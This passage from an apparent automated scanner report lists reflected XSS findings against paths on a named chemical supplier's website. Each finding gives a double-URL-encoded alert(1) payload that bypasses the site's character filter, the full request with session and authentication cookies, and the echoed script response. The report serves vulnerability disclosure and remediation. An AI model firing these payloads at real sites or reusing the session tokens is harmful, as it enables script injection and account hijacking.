bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support1f339";alert(1)//6ecc21c7619/customer-service/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.194. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb8f3%2522%253balert%25281%2529%252f%252f224aa488655 was submitted in the REST URL parameter 4. This input was echoed as bb8f3";alert(1)//224aa488655 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-servicebb8f3%2522%253balert%25281%2529%252f%252f224aa488655/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-servicebb8f3";alert(1)//224aa488655/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.195. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbeae%2522%253balert%25281%2529%252f%252fdd5596ba3db was submitted in the REST URL parameter 5. This input was echoed as dbeae";alert(1)//dd5596ba3db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicesdbeae%2522%253balert%25281%2529%252f%252fdd5596ba3db/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:41 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicesdbeae";alert(1)//dd5596ba3db/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.196. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 925a3%2522%253balert%25281%2529%252f%252fdb8225a6dbb was submitted in the REST URL parameter 6. This input was echoed as 925a3";alert(1)//db8225a6dbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/mfg-production925a3%2522%253balert%25281%2529%252f%252fdb8225a6dbb/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/mfg-production925a3";alert(1)//db8225a6dbb/oem-services","E404") ;
   </script>
...[SNIP]...

1.197. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ae7%2522%253balert%25281%2529%252f%252fa376a5f7f23 was submitted in the REST URL parameter 7. This input was echoed as 14ae7";alert(1)//a376a5f7f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services14ae7%2522%253balert%25281%2529%252f%252fa376a5f7f23 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:45 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services14ae7";alert(1)//a376a5f7f23","E404") ;
   </script>
...[SNIP]...

1.198. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83a71%2522%253balert%25281%2529%252f%252f4e9b2e06d4b was submitted in the REST URL parameter 1. This input was echoed as 83a71";alert(1)//4e9b2e06d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content83a71%2522%253balert%25281%2529%252f%252f4e9b2e06d4b/sigma-aldrich/customer-support/customer-service/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
